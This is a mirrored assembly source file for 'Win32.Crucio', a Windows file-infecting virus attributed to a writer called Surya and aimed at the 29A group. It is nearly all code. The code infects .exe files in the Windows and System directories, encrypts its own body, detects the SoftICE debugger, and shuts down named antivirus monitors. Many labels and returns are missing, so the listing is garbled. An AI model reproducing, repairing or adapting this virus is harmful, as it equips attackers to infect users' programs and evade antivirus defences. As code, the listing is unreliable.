mirror of
synced 2025-02-21 06:06:01 +00:00
729 lines
14 KiB
729 lines
14 KiB
; ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
; ccc rrrr u u ccc i oo
; c r r u u c i o o
; c r r u u c i o o
; c r r u u c i o o
; c rrrr u u c i o o
; c r r u u c i o o
; c r r u u c i o o
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; ²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²
;Win32.Crucio by powerdryv = Surya
;This was my very 1st of the viruses.Now, since I wanted to contribute
;to 29A,I value-added to this virus. The virus now is encrypted with a
;simple Sliding Key Alogo.,(XOR being the operation). For each dword
;being encrypted the Key increases by 4.After the XOR operation is per-
;formed the dword gets again encrypted thru FPU instuction.The algo.
;used for encryption is simple.In 1st step the dword get squared, then
;its added to itself and again it gets squared.So u see the simplicity.
; Anti-Emulation : Yes, again using FPI
; Anti-AV : Shuts down AV monitors
; PayLoad : On every 25th of month shows a message box
; Resident : No
; Poly : No
; Sets up SEH frams, (well that's a necessity)
.model flat
extrn ExitProcess:proc
extrn MessageBoxA:proc
SizeOfVirus equ (offset EndOfVirus-StartOfVirus)/4
EncodedVirus equ (EEndOfVirus-EStartOfVirus)/4
SizeOne equ (StartOfVirus-EStartOfVirus)/4
szTitle db "Win32.Crucio by Surya",0
Message db "In every color there's the light",13
db "In every stone sleeps a crystal",13
db "Remember the Shaman when he used to say:",13
db "Man is the dream of the dolphin.",0
SoftIce9x db "\\.\SICE",0
SoftIceNT db "\\.\NTSICE",0
StartOfVirus label byte
Start: call Delta
Delta: fnop
pop ebp
mov eax, offset Delta
fild [ebp]
fild [eax]
fistp dword ptr [Impy]
mov ebp, Impy
call CheckDebggers
mov ecx, EncodedVirus
lea edi, [ebp+EStartOfVirus]
call Decoder
jmp RealStart
Impy dd 0
EStartOfVirus label byte
mov esi, [esp]
and esi, 0FFFF0000h
mov ecx, 5
sub esi, 10000h
cmp word ptr [esi], "ZM"
je Check4PE
loop Check4MZ
mov ecx, cs
xor cl, cl
jecxz WinNT
mov esi, 0BFF70000h
jmp Check4PE
mov esi, 077F00000h
Check4PE: cmp dword ptr [esi+80h], 'EP'
jne Check4MZ
mov dword ptr [ebp+@Kernel@], esi
xchg eax, esi
call SetSEH
mov esp, [esp+8h]
jmp ResSEH
push dword ptr fs:[0]
mov fs:[0], esp
@1: lea edi, [ebp+ApiOffsets]
lea esi, [ebp+ApiNames]
call GetApi
call CloseAV
push 0
push 80h
push 3h
push 0h
push 1h
push 0C0000000h
push offset SoftIce9x
call [ebp+@CreateFileA@]
inc eax
jnz Detected
dec eax
push 0
push 80h
push 3h
push 0h
push 1h
push 0C0000000h
push offset SoftIceNT
call [ebp+@CreateFileA@]
inc eax
jnz Detected
dec eax
lea eax, [ebp+Samay]
push eax
call [ebp+@GetSystemTime@]
cmp word ptr [ebp+S_wDay], 25h
je Detected
call MainInfection1
call MainInfection2
pop dword ptr fs:[0]
push 0
call ExitProcess
push 128
lea eax, [ebp+offset windir]
push eax
mov eax, [ebp+offset @GetWindowsDirectoryA@]
call eax
push 128
lea eax, [ebp+offset sysdir]
push eax
mov eax, [ebp+offset @GetSystemDirectoryA@]
call eax
Return: ret
@3: lea eax, [ebp+windir]
push eax
call [ebp+@SetCurrentDirectoryA@]
call FindThem
jmp ResSEH
lea eax, [ebp+sysdir]
push eax
call [ebp+@SetCurrentDirectoryA@]
call FindThem
jmp ResSEH
FindThem proc
lea eax, [ebp+Win32_Find_Data]
push eax
lea eax, [ebp+EXEtension]
push eax
call [ebp+@FindFirstFileA@]
inc eax
jz Failed2Find
dec eax
mov dword ptr [ebp+SearchHandle], eax
push dword ptr [ebp+OldEIP]
push dword ptr [ebp+NewBase]
call InfectThem
pop dword ptr [ebp+NewBase]
push dword ptr [ebp+OldEIP]
lea edi, [ebp+Win32_Find_Data]
mov ecx, MAX_PATH
xor al, al
rep stosb
lea eax, [ebp+Win32_Find_Data]
push eax
push dword ptr [ebp+EXEtension]
call [ebp+@FindNextFileA@]
test eax, eax
jz Failed2Find
jmp @@1
push dword ptr [ebp+SearchHandle]
call [ebp+@FindClose@]
Failed2Find: ret
FindThem endp
GetApi proc
@_1: push esi
push edi
call GetTheApis
pop edi
pop esi
xchg edi, esi
xor al, al
@_2: scasb
jnz @_2
xchg edi, esi
@_3: cmp byte ptr [esi], 0BBh
je Return2
jmp @_1
Return2: ret
GetApi endp
GetTheApis proc
mov edx, esi
mov edi, esi
xor al, al
@@_1: scasb
jnz @@_1
sub edi, esi
mov ecx, edi
xor eax, eax
mov word ptr [ebp+Counter], ax
mov esi, [ebp+@Kernel@]
add esi, 3ch
add eax, [ebp+@Kernel@]
mov esi, [eax+78h]
add esi, 1ch
add esi, [ebp+@Kernel@]
add eax, [ebp+@Kernel@]
mov dword ptr [ebp+@AddyTable@], eax
add eax, [ebp+@Kernel@]
push eax
add eax, [ebp+@Kernel@]
mov dword ptr [ebp+@OrdinalTable@], eax
pop esi
xor ebx,ebx
@@_2: push esi
add eax, [ebp+@Kernel@]
mov esi, eax
mov edi, edx
push ecx
rep cmpsb
pop ecx
jz @@_3
pop esi
add esi, 4
inc ebx
inc word ptr [ebp+Counter]
jmp @@_2
@@_3: pop esi
movzx eax, word ptr [ebp+Counter]
shl eax, 1
add eax, dword ptr [ebp+@OrdinalTable@]
xor esi, esi
xchg eax, esi
shl eax, 2
add eax, dword ptr [ebp+@AddyTable@]
mov esi, eax
add eax, [ebp+@Kernel@]
GetTheApis endp
InfectThem proc
lea eax, [ebp+WFD_szFileName]
push 80h
push eax
call [ebp+@SetFileAttributesA@]
call OpenIt
inc eax
jz Failed2Open
dec eax
mov [ebp+FileHandle], eax ;dword ptr
mov ecx, [ebp+WFD_nFileSizeLow]
call CreateMapOfIt
test eax, eax
jz CantMap ;to Close the file
mov [ebp+MapHandle], eax
call MapIt
test eax, eax
jz UnmapIt
mov [ebp+MapAddy], eax
mov esi, [eax+3ch]
add esi, eax
cmp dword ptr [esi], 'EP'
jne LeaveIt
cmp dword ptr [esi+4ch], 'aea' ;Gaea
jne LeaveIt
push dword ptr [esi+3ch]
push dword ptr [ebp+MapAddy]
call [ebp+@CloseHandle@]
pop ecx
mov eax, [ebp+WFD_nFileSizeLow]
add eax, SizeOfVirus
call AlignIt
xchg ecx, eax
call CreateMapOfIt
test eax, eax
jz CantMap ;to Close the file
mov [ebp+MapHandle], eax
mov ecx, [ebp+NewSize]
call MapIt
test eax, eax
jz UnmapIt
mov [ebp+MapAddy], eax
mov esi, [eax+3ch]
add esi, eax
mov [ebp+PEHeader], esi
xor eax, eax
mov ax, word ptr [esi+6ch] ;
dec eax
imul eax, eax, 28h
add esi, 78h
add esi, eax
mov ebx, [ebp+PEHeader+74h]
shl ebx, 3
add esi, ebx
mov eax, [ebp+PEHeader+28h]
mov [ebp+OldEIP], eax ;dword ptr
mov eax, [ebp+PEHeader+34h]
mov [ebp+NewBase], eax ;dword ptr
mov ebx, [esi+10h]
mov edx, ebx
mov ebx, [esi+14h]
push ebx
mov edi, [ebp+PEHeader]
mov eax, edx
add eax, [esi+0ch]
mov [edi+28h], eax
mov dword ptr [ebp+NewEIP], eax
mov eax, [esi+10h]
add eax, SizeOfVirus
mov ecx, [edi+3ch]
call AlignIt
mov [esi+10h], eax
mov [esi+08h], eax
pop ebx
mov eax, [esi+10ch]
add eax, [esi+0ch]
mov [edi+50h], eax
or dword ptr [esi+24h], 0A0000020h
mov dword ptr [edi+4ch], 'aea'
lea esi, [ebp+Start]
mov edi, ebx
add edi, dword ptr [ebp+MapAddy]
mov ecx, SizeOne
rep movsd
mov ecx, EncodedVirus
lea esi, [ebp+RealStart]
call RandomNo
mov [ebp+EncKey], eax
Loop1: xor esi, [ebp+EncKey]
add [ebp+EncKey], 4h
fild dword ptr [esi]
fild dword ptr [esi]
fadd st, st
fistp dword ptr [ebx]
fild dword ptr [ebx]
fild dword ptr [ebx]
fistp dword ptr [esi]
add esi, 4h
loop Loop1
lea esi, [ebp+Decoder]
mov ecx, (Ending-Decoder)/4
add esi, 4h
loop Loop3
jmp UnmapIt
call TruncateIt
push dword ptr [ebp+MapAddy]
call [ebp+@UnmapViewOfFile@]
push dword ptr [ebp+MapHandle]
call [ebp+@CloseHandle@]
push dword ptr [ebp+FileHandle]
call [ebp+@CloseHandle@]
jmp ResSEH
push 0
push offset szTitle
push offset Message
push 00h
call MessageBoxA
push 0
call ExitProcess
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax, [ebp+WFD_szFileName]
push eax
call [ebp+@SetFileAttributesA@]
InfectThem endp
AlignIt proc
push ebx
xor ebx, ebx
push eax
div ecx
pop eax
sub ecx, ebx
add eax, ecx
pop ebx
AlignIt endp
CreateMapOfIt proc
push 0
push ecx
push 0
push 4h
push dword ptr [ebp+FileHandle]
call [ebp+@CreateFileMappingA@]
CreateMapOfIt endp
MapIt proc
push ecx
push 0
push 0
push 2h
push dword ptr [ebp+MapHandle]
call [ebp+@MapViewOfFile@]
MapIt endp
OpenIt proc
push 0
push 0
push 3h
push 0
push 1h
push 80000000h or 40000000h
push eax
call [ebp+@CreateFileA@]
OpenIt endp
TruncateIt proc
push 0
push 0
push ecx
push dword ptr [ebp+FileHandle]
call [ebp+@SetFilePointer@]
push dword ptr [ebp+FileHandle]
call [ebp+@SetEndOfFile@]
TruncateIt endp
RandomNo proc
db 0fh, 31h
mov [ebp+Ran0], eax
call [ebp+@GetTickCount@]
mov [ebp+Ran1], eax
call [ebp+@GetTickCount@]
mov [ebp+Ran2], eax
call [ebp+@GetTickCount@]
mov [ebp+Ran3], eax
add eax, [ebp+Ran1]
call ClDoer
ror eax, cl
add eax, [ebp+Ran0]
shl eax, 7h
call ClDoer
rol eax, cl
add eax, [ebp+Ran2]
sub eax, [ebp+Ran3]
call ClDoer
ror eax, cl
mov [ebp+EncKey], eax
ClDoer proc near
in al, 40h
mov cl, al
ClDoer endp
RandomNo endp
CloseAV proc
lea eax, [ebp+AVList]
call CloseAVs
xor al, al
jnz $-1
cmp byte ptr [edi], 0BBh
jnz Loop2
CloseAV endp
CloseAVs proc
push edi
push 0
call [ebp+@FindWindowA@]
test eax, eax
jz Return3
push 0
push 0
push 12h
push eax
call [ebp+@PostMessageA@]
xor cl, cl
org $-1
CloseAVs endp
db "I inspire.....",0
ApiNames label byte
@FindFirstFileA db "FindFirstFileA",0
@FindNextFileA db "FindNextFileA",0
@FindClose db "FindClose",0
@CreateFileA db "CreateFileA",0
@SetFilePointer db "SetFilePointer",0
@SetFileAttributesA db "SetFileAttributesA",0
@CloseHandle db "CloseHandle",0
@GetCurrentDirectoryA db "GetCurrentDirectoryA",0
@SetCurrentDirectoryA db "SetCurrentDirectoryA",0
@GetWindowsDirectoryA db "GetWindowsDirectoryA",0
@GetSystemDirectoryA db "GetSystemDirectoryA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile db "MapViewOfFile",0
@UnmapViewOfFile db "UnmapViewOfFile",0
@SetEndOfFile db "SetEndOfFile",0
@GetTickCount db "GetTickCount",0
@GetSystemTime db "GetSystemTime",0
@FindWindowA db "FindWindowA",0
@PostMessageA db "PostMessageA",0
db 0BBh
AVList label byte
db "AVP Monitor",0
db "Amon Antivirus Monitor",0
db "McAfee Scan",0
db 0BBh
EXEtension db '*.exe',0
@Kernel@ dd 00000000h
EncKey dd 00000000h
@Start@ dd 00000000h
@AddyTable@ dd 00000000h
@OrdinalTable@ dd 00000000h
FileHandle dd 00000000h
SearchHandle dd 00000000h
MapHandle dd 00000000h
MapAddy dd 00000000h
PEHeader dd 00000000h
NewEIP dd 00000000h
NewSize dd 00000000h
Counter dw 0000h
ApiOffsets label byte
@FindFirstFileA@ dd 0
@FindNextFileA@ dd 0
@FindClose@ dd 0
@CreateFileA@ dd 0
@SetFilePointer@ dd 0
@SetFileAttributesA@ dd 0
@CloseHandle@ dd 0
@GetCurrentDirectoryA@ dd 0
@SetCurrentDirectoryA@ dd 0
@GetWindowsDirectoryA@ dd 0
@GetSystemDirectoryA@ dd 0
@CreateFileMappingA@ dd 0
@MapViewOfFile@ dd 0
@UnmapViewOfFile@ dd 0
@SetEndOfFile@ dd 0
@GetTickCount@ dd 0
@GetSystemTime@ dd 0
@FindWindowA@ dd 0
@PostMessageA@ dd 0
Ran1 dd 0
Ran2 dd 0
Ran0 dd 0
Ran3 dd 0
MAX_PATH equ 260
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
Win32_Find_Data label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db MAX_PATH dup (?)
WFD_szAlternateFileName db 13 dup (?)
db 03 dup (?)
Samay label byte
S_wYear dw ?
S_wMonth dw ?
S_wDayOfWeek dw ?
S_wDay dw ?
S_wHour dw ?
S_wMinute dw ?
S_wSecond dw ?
S_wMilliseconds dw ?
sysdir db 128h dup(0)
windir db 128h dup(0)
curdir db 128h dup(0)
OldEIP dd 0
NewBase dd 0
EEndOfVirus label byte
Decoder proc
test ebp, ebp
jz EndDecod
mov eax, dword [ebp+EncKey]
mov ebx, 2h
mov edx, dword ptr [edi]
fild dword ptr [edx]
fistp dword ptr [Var1]
fild dword ptr [ebx]
fild dword ptr [Var1]
xor edx, eax
add eax, 4h
mov dword ptr [edi], edx
add edi, 4
loop Looploopy
EndDecod: ret
mov ecx, fs:[20h]
jecxz EndDecod
mov dword ptr [ebp+EncKey], -1
Decoder endp
Var1 dd 0
EndOfVirus label byte
Ending: end Start
; I inspire.... |